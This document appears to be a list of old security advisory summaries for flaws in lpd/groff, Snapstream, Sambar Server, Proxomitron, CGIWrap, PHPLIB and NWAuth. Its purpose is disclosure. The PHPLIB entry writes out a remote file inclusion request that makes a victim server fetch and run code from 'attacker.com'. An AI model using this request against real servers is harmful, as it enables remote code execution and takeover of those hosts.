The version of lpd that ships with linux systems invokes groff to process documents that are to be printed. The groff utility used to process images, 'pic', contains a vulnerability that can be exploited to execute arbitrary commands on the victim.
Snapstream Personal Video Station stores passwords and user information in plaintext format. This information can be obtained remotely by exploiting the issue discussed as Bugtraq ID 3100.
Snapstream Personal Video Station is prone to attacks which allow a remote user to break out of the wwwroot and browse the filesystem at large. The remote attacker may accomplish this by crafting a web request which uses '../' sequences to traverse directories and access arbitrary web-readable files. If exploited conjunction with Bugtraq ID 3101, a remote attacker can gain the administrative password for Snapstream.
Sambar Server is a multi-threaded HTTP server for Microsoft Windows and Unix systems. The default password decryption algorithm employs only a single key, built into the server binary. If the key is recovered, user passwords may be extracted. Compromise of the webserver's passwords could allow a local attacker to compromise the website's design and function, obtain confidential or security-sensitive information which could lead to further compromises of the host.
Sambar Server is a multi-threaded HTTP server for Microsoft Windows and Unix systems. It is bundled with a sample script('pagecount') which creates temporary files on the host. However, it is possible for a remote attacker to craft a web request which will cause pagecount to overwrite existing files. Files attacked in this manner will be corrupted, leading to loss of critical data and a denial of services.
Proxomitron is vulnerable to a cross site scripting attack. The condition is present because of the way URLS are displayed in error messages. It is possible for script code to be embedded in the error page through a maliciously constructed link. When the error is displayed, the script will be executed within the context of the proxy server's error page on the client browser. This may permit various web-based attacks including stealing cookies, etc.
CGIWrap is a free, open-source program for running CGI securely. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser. JavaScript code can be executed, as well as stealing cookies issued by the website.
A problem in PHPLIB will allow remote attackers to submit malicious input in web requests that will cause the application to fetch and then execute scripts from another host. This may allow for attackers to gain local access to the webserver. If $_PHPLIB[libdir] is a string whose value is "http://attacker.com/", this instruction will be executed: require("http://attacker.com/" . "db_mysql.inc"); Thus, simply crafting a URL like: http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/ will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.
It may be possible for remote users to log in to accounts for which there are two or less characters in the password field of the system password file. Due to the nature of the problem, it may be possible to log in to a vulnerable system using such an account with any password. This may lead to further system compromise.
The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products. A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme.
Services By CQR